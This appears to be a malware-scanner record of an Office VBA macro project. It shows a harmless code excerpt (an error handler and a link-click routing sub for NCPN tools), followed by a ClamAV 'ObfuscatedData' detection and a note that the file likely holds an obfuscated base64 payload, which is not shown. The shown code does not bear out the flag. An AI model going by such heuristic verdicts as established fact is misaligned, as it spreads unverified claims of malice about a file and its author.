    Exit Sub
    
Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - Initialize[mod_App_UI])"
    End Select
    Resume Exit_Handler
End Sub

' ---------------------------------
' SUB:          ClickAction
' Description:  Handles click events for various form links
' Assumptions:  Link caption and tag text matches action text values.
'               If a link caption &/or tag changes, the corresponding action must change
'               here too.
' Parameters:   action - concatenated link label caption & tag (string)
' Returns:      N/A
' Throws:       none
' References:   none
' Source/date:
' Adapted:      Bonnie Campbell, February 6, 2015 - for NCPN tools
' Revisions:
'   BLC - 4/26/2016  - initial version
' ---------------------------------
Public Sub ClickAction(action As String)
On Error GoTo Err_Handler

    Dim fName As String, rName As String, oArgs As String
    
    action = LCase(Nz(Trim(action), ""))
    
    'defaults
    fName = ""
    rName = ""
    oArgs = ""
    
    Select Case action
        'Where?
        Case "site"
            fName = "Task"
        Case "feature"
            fName = "Task"
        Case "transect"
        Case "plot"
        'Sampling
        Case "event"
            fName = "Task"
…
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 107008 bytes
SHA-256: e54201ede93a56615012276faf12426406b2f8a01acbd3287cb7b03e6d5d56a3
Detection
ClamAV: Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).